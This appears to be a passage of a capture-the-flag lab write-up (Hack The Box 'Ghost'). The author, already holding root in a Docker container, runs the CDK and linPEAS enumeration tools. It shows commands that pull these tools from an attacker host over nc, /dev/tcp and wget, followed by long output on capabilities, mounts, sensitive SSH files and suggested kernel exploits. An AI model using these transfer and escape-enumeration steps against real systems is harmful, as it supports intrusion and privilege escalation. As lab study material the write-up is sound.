CDK - Zero Dependency Container Penetration Toolkit


Conducting automated enumeration after the manual enumeration

cdk is an open-source container penetration toolkit, designed to offer stable exploitation in different slimmed-down containers without any OS dependency. It comes with useful net-tools and many powerful PoCs/EXPs and helps you escape the container and take over the K8s cluster easily.

┌──(kali㉿kali)-[~/archive/htb/labs/ghost]
└─$ nc -lvp 2222 < cdk
listening on [any] 2222 ...
connect to [10.10.14.58] from dc01.ghost.htb [10.10.11.24] 61044
 
root@621de11273cb:~# cat < /dev/tcp/10.10.14.58/2222 > cdk

Delivery complete

root@621de11273cb:~# chmod 755 cdk 
root@621de11273cb:~# ./cdk eva --full
./cdk eva --full
CDK (Container DucK)
CDK Version(GitCommit): 306f3ced50188ab2c41e0e924c1cde35ecbb520d
Zero-dependency cloudnative k8s/docker/serverless penetration toolkit by cdxy & neargle
Find tutorial, configuration and use-case in https://github.com/cdk-team/CDK/
 
[  Information Gathering - System Info  ]
2024/07/15 22:26:17 current dir: /root
2024/07/15 22:26:17 current user: root uid: 0 gid: 0 home: /root
2024/07/15 22:26:17 hostname: 621de11273cb
2024/07/15 22:26:17 debian debian 12.6 kernel: 5.15.0-113-generic
2024/07/15 22:26:17 Setuid files found:
	/usr/sbin/exim4
	/usr/bin/chfn
	/usr/bin/chsh
	/usr/bin/gpasswd
	/usr/bin/mount
	/usr/bin/newgrp
	/usr/bin/passwd
	/usr/bin/su
	/usr/bin/umount
	/sbin/exim4
	/bin/chfn
	/bin/chsh
	/bin/gpasswd
	/bin/mount
	/bin/newgrp
	/bin/passwd
	/bin/su
	/bin/umount
 
[  Information Gathering - Services  ]
2024/07/15 22:26:17 service found in process:
	20	1	ssh
2024/07/15 22:26:17 service found in process:
	21	1	ssh
2024/07/15 22:26:17 service found in process:
	1146	1144	python3
2024/07/15 22:26:17 service found in process:
	1215	1147	ssh
 
[  Information Gathering - Commands and Capabilities  ]
2024/07/15 22:26:17 available commands:
	curl,wget,find,ps,python3,apt,dpkg,ssh,git,svn,mount,gcc,g++,make,base64,perl
2024/07/15 22:26:17 Capabilities hex of Caps(CapInh|CapPrm|CapEff|CapBnd|CapAmb):
	CapInh:	0000000000000000
	CapPrm:	00000000a80425fb
	CapEff:	00000000a80425fb
	CapBnd:	00000000a80425fb
	CapAmb:	0000000000000000
	Cap decode: 0x00000000a80425fb = CAP_CHOWN,CAP_DAC_OVERRIDE,CAP_FOWNER,CAP_FSETID,CAP_KILL,CAP_SETGID,CAP_SETUID,CAP_SETPCAP,CAP_NET_BIND_SERVICE,CAP_NET_RAW,CAP_SYS_CHROOT,CAP_MKNOD,CAP_AUDIT_WRITE,CAP_SETFCAP
[*] Maybe you can exploit the Capabilities below:
 
[  Information Gathering - Mounts  ]
0:49 / / rw,relatime - overlay overlay rw,lowerdir=/var/lib/docker/overlay2/l/OUXOG24Z2PTTMPPFUJJGUPYC5C:/var/lib/docker/overlay2/l/OUMACUJZSOBMTOOCBCU2TAIUIM:/var/lib/docker/overlay2/l/34KT2FTDQPDKGOQXFZTTK2WC6E:/var/lib/docker/overlay2/l/7M55USJHXPAZETBOTUA244DTCB:/var/lib/docker/overlay2/l/GENV37QCN67KBDJIXSB26LRU5W:/var/lib/docker/overlay2/l/75NCT7SAV5UGG5LAVQEUPBPUCG:/var/lib/docker/overlay2/l/LLTSLSD7ZD3UD6M5NGZ62OUNEO:/var/lib/docker/overlay2/l/LQX6MENKLII2G6RWKFPMJQPFGJ:/var/lib/docker/overlay2/l/7DUUI4ESJBRE3RONRKAZCD4XEP:/var/lib/docker/overlay2/l/XFX2DH67VUIB7PANFIAKTREGZX:/var/lib/docker/overlay2/l/LMDGBSZKR5BNBZPJWPGEBQ2BFX:/var/lib/docker/overlay2/l/LDXSULCHALJNL5MKW7EJWIIFMH:/var/lib/docker/overlay2/l/RITJUYCNNRP5E354NXU6U66KAN:/var/lib/docker/overlay2/l/Y4W4JTSH5SKHDXHLPZAKXWXNLU,upperdir=/var/lib/docker/overlay2/c6e9c1d5eb7498d0aecc70b371b69cf06e40bc546a310f802e25f652b388b7a2/diff,workdir=/var/lib/docker/overlay2/c6e9c1d5eb7498d0aecc70b371b69cf06e40bc546a310f802e25f652b388b7a2/work
0:85 / /proc rw,nosuid,nodev,noexec,relatime - proc proc rw
0:86 / /dev rw,nosuid - tmpfs tmpfs rw,size=65536k,nr_inodes=219662,mode=755,inode64
0:87 / /dev/pts rw,nosuid,noexec,relatime - devpts devpts rw,gid=5,mode=620,ptmxmode=666
0:88 / /sys ro,nosuid,nodev,noexec,relatime - sysfs sysfs ro
0:29 / /sys/fs/cgroup ro,nosuid,nodev,noexec,relatime - cgroup2 cgroup rw,nsdelegate,memory_recursiveprot
0:62 / /dev/mqueue rw,nosuid,nodev,noexec,relatime - mqueue mqueue rw
0:89 / /dev/shm rw,nosuid,nodev,noexec,relatime - tmpfs shm rw,size=65536k,nr_inodes=219662,inode64
8:2 /var/lib/docker/containers/621de11273cbfdc31108816fea1ad9cb3b88492aea50666567d0479deb7076bb/resolv.conf /etc/resolv.conf rw,relatime - ext4 /dev/sda2 rw
8:2 /var/lib/docker/containers/621de11273cbfdc31108816fea1ad9cb3b88492aea50666567d0479deb7076bb/hostname /etc/hostname rw,relatime - ext4 /dev/sda2 rw
8:2 /var/lib/docker/containers/621de11273cbfdc31108816fea1ad9cb3b88492aea50666567d0479deb7076bb/hosts /etc/hosts rw,relatime - ext4 /dev/sda2 rw
0:85 /bus /proc/bus ro,nosuid,nodev,noexec,relatime - proc proc rw
0:85 /fs /proc/fs ro,nosuid,nodev,noexec,relatime - proc proc rw
0:85 /irq /proc/irq ro,nosuid,nodev,noexec,relatime - proc proc rw
0:85 /sys /proc/sys ro,nosuid,nodev,noexec,relatime - proc proc rw
0:85 /sysrq-trigger /proc/sysrq-trigger ro,nosuid,nodev,noexec,relatime - proc proc rw
0:95 / /proc/acpi ro,relatime - tmpfs tmpfs ro,size=878648k,nr_inodes=219662,inode64
0:86 /null /proc/kcore rw,nosuid - tmpfs tmpfs rw,size=65536k,nr_inodes=219662,mode=755,inode64
0:86 /null /proc/keys rw,nosuid - tmpfs tmpfs rw,size=65536k,nr_inodes=219662,mode=755,inode64
0:86 /null /proc/timer_list rw,nosuid - tmpfs tmpfs rw,size=65536k,nr_inodes=219662,mode=755,inode64
0:96 / /proc/scsi ro,relatime - tmpfs tmpfs ro,size=878648k,nr_inodes=219662,inode64
0:97 / /sys/firmware ro,relatime - tmpfs tmpfs ro,size=878648k,nr_inodes=219662,inode64
0:98 / /sys/devices/virtual/powercap ro,relatime - tmpfs tmpfs ro,size=878648k,nr_inodes=219662,inode64
 
[  Information Gathering - Net Namespace  ]
	container net namespace isolated.
 
[  Information Gathering - Sysctl Variables  ]
2024/07/15 22:26:17 net.ipv4.conf.all.route_localnet = 0
 
[  Information Gathering - DNS-Based Service Discovery  ]
error when requesting coreDNS: lookup any.any.svc.cluster.local. on 127.0.0.11:53: server misbehaving
error when requesting coreDNS: lookup any.any.any.svc.cluster.local. on 127.0.0.11:53: server misbehaving
 
[  Discovery - K8s API Server  ]
2024/07/15 22:26:17 checking if api-server allows system:anonymous request.
err found while searching local K8s apiserver addr.:
err: cannot find kubernetes api host in ENV
	api-server forbids anonymous request.
	response:
 
[  Discovery - K8s Service Account  ]
load K8s service account token error.:
open /var/run/secrets/kubernetes.io/serviceaccount/token: no such file or directory
 
[  Discovery - Cloud Provider Metadata API  ]
2024/07/15 22:26:18 failed to dial Alibaba Cloud API.
2024/07/15 22:26:19 failed to dial Azure API.
2024/07/15 22:26:20 failed to dial Google Cloud API.
2024/07/15 22:26:21 failed to dial Tencent Cloud API.
2024/07/15 22:26:22 failed to dial OpenStack API.
2024/07/15 22:26:23 failed to dial Amazon Web Services (AWS) API.
2024/07/15 22:26:24 failed to dial ucloud API.
 
[  Exploit Pre - Kernel Exploits  ]
2024/07/15 22:26:24 refer: https://github.com/mzet-/linux-exploit-suggester
[+] [CVE-2022-0847] DirtyPipe
 
   Details: https://dirtypipe.cm4all.com/
   Exposure: less probable
   Tags: ubuntu=(20.04|21.04),debian=11
   Download URL: https://haxx.in/files/dirtypipez.c
 
[+] [CVE-2021-22555] Netfilter heap out-of-bounds write
 
   Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
   Exposure: less probable
   Tags: ubuntu=20.04{kernel:5.8.0-*}
   Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
   Comments: ip_tables kernel module must be loaded
 
 
 
[  Information Gathering - Sensitive Files  ]
	.dockerenv - /.dockerenv
	/.bashrc - /etc/skel/.bashrc
	/.bash_history - /root/.bash_history
	/.bashrc - /root/.bashrc
	/.ssh/ - /root/.ssh/config
	/.ssh/ - /root/.ssh/controlmaster
	/.ssh/ - /root/.ssh/known_hosts
	/.ssh/ - /root/.ssh/known_hosts.old
 
[  Information Gathering - ASLR  ]
2024/07/15 22:26:27 /proc/sys/kernel/randomize_va_space file content: 2
2024/07/15 22:26:27 ASLR is enabled.
 
[  Information Gathering - Cgroups  ]
2024/07/15 22:26:27 /proc/1/cgroup file content:
	0::/
2024/07/15 22:26:27 /proc/self/cgroup file added content (compare pid 1) :
root@621de11273cb:~# ./cdk ifconfig
./cdk ifconfig
2024/07/15 22:27:48 [+] run ifconfig, using GetLocalAddresses()
2024/07/15 22:27:48 lo 127.0.0.1/8
2024/07/15 22:27:48 lo ::1/128
2024/07/15 22:27:48 eth0 172.18.0.3/16
 
root@621de11273cb:~# ./cdk netstat
./cdk netstat
2024/07/15 22:28:09 [+] run netstat, using RunNestat()
ipType		connection	localAddr			status			remoteAddr			pid
ipv4		tcp		0.0.0.0:8000    		LISTEN       		0.0.0.0:0       		1
ipv4		tcp		127.0.0.11:39837		LISTEN       		0.0.0.0:0       		0
ipv4		tcp		172.18.0.3:34692		ESTABLISHED  		10.10.14.58:9999		1973
ipv4		tcp		172.18.0.3:55090		ESTABLISHED  		172.18.0.2:22   		21
ipv4		tcp		172.18.0.3:43910		CLOSE_WAIT   		10.10.16.79:1234		1142
ipv4		udp		127.0.0.11:57612		NONE         		0.0.0.0:0       		0

PEAS


Conducting automated enumeration after the manual enumeration

root@621de11273cb:~# wget http://10.10.14.58/linpeas_CVE_check.sh 
--2024-07-15 22:30:23--  http://10.10.14.58/linpeas_CVE_check.sh
Connecting to 10.10.14.58:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 828172 (809K) [text/x-sh]
Saving to: 'linpeas_CVE_check.sh'
 
linpeas_CVE_check.sh 100%[===================>] 808.76K  3.64MB/s    in 0.2s    
 
2024-07-15 22:30:24 (3.64 MB/s) - 'linpeas_CVE_check.sh' saved [828172/828172]

Delivery complete

Container


Files


╔══════════╣ Interesting Files Mounted
overlay on / type overlay (rw,relatime,lowerdir=/var/lib/docker/overlay2/l/OUXOG24Z2PTTMPPFUJJGUPYC5C:/var/lib/docker/overlay2/l/OUMACUJZSOBMTOOCBCU2TAIUIM:/var/lib/docker/overlay2/l/34KT2FTDQPDKGOQXFZTTK2WC6E:/var/lib/docker/overlay2/l/7M55USJHXPAZETBOTUA244DTCB:/var/lib/docker/overlay2/l/GENV37QCN67KBDJIXSB26LRU5W:/var/lib/docker/overlay2/l/75NCT7SAV5UGG5LAVQEUPBPUCG:/var/lib/docker/overlay2/l/LLTSLSD7ZD3UD6M5NGZ62OUNEO:/var/lib/docker/overlay2/l/LQX6MENKLII2G6RWKFPMJQPFGJ:/var/lib/docker/overlay2/l/7DUUI4ESJBRE3RONRKAZCD4XEP:/var/lib/docker/overlay2/l/XFX2DH67VUIB7PANFIAKTREGZX:/var/lib/docker/overlay2/l/LMDGBSZKR5BNBZPJWPGEBQ2BFX:/var/lib/docker/overlay2/l/LDXSULCHALJNL5MKW7EJWIIFMH:/var/lib/docker/overlay2/l/RITJUYCNNRP5E354NXU6U66KAN:/var/lib/docker/overlay2/l/Y4W4JTSH5SKHDXHLPZAKXWXNLU,upperdir=/var/lib/docker/overlay2/c6e9c1d5eb7498d0aecc70b371b69cf06e40bc546a310f802e25f652b388b7a2/diff,workdir=/var/lib/docker/overlay2/c6e9c1d5eb7498d0aecc70b371b69cf06e40bc546a310f802e25f652b388b7a2/work)
proc on /proc type proc (rw,nosuid,nodev,noexec,relatime)
tmpfs on /dev type tmpfs (rw,nosuid,size=65536k,nr_inodes=219662,mode=755,inode64)
devpts on /dev/pts type devpts (rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=666)
sysfs on /sys type sysfs (ro,nosuid,nodev,noexec,relatime)
cgroup on /sys/fs/cgroup type cgroup2 (ro,nosuid,nodev,noexec,relatime,nsdelegate,memory_recursiveprot)
mqueue on /dev/mqueue type mqueue (rw,nosuid,nodev,noexec,relatime)
shm on /dev/shm type tmpfs (rw,nosuid,nodev,noexec,relatime,size=65536k,nr_inodes=219662,inode64)
/dev/sda2 on /etc/resolv.conf type ext4 (rw,relatime)
/dev/sda2 on /etc/hostname type ext4 (rw,relatime)
/dev/sda2 on /etc/hosts type ext4 (rw,relatime)
proc on /proc/bus type proc (ro,nosuid,nodev,noexec,relatime)
proc on /proc/fs type proc (ro,nosuid,nodev,noexec,relatime)
proc on /proc/irq type proc (ro,nosuid,nodev,noexec,relatime)
proc on /proc/sys type proc (ro,nosuid,nodev,noexec,relatime)
proc on /proc/sysrq-trigger type proc (ro,nosuid,nodev,noexec,relatime)
tmpfs on /proc/acpi type tmpfs (ro,relatime,size=878648k,nr_inodes=219662,inode64)
tmpfs on /proc/kcore type tmpfs (rw,nosuid,size=65536k,nr_inodes=219662,mode=755,inode64)
tmpfs on /proc/keys type tmpfs (rw,nosuid,size=65536k,nr_inodes=219662,mode=755,inode64)
tmpfs on /proc/timer_list type tmpfs (rw,nosuid,size=65536k,nr_inodes=219662,mode=755,inode64)
tmpfs on /proc/scsi type tmpfs (ro,relatime,size=878648k,nr_inodes=219662,inode64)
tmpfs on /sys/firmware type tmpfs (ro,relatime,size=878648k,nr_inodes=219662,inode64)
tmpfs on /sys/devices/virtual/powercap type tmpfs (ro,relatime,size=878648k,nr_inodes=219662,inode64)

DNS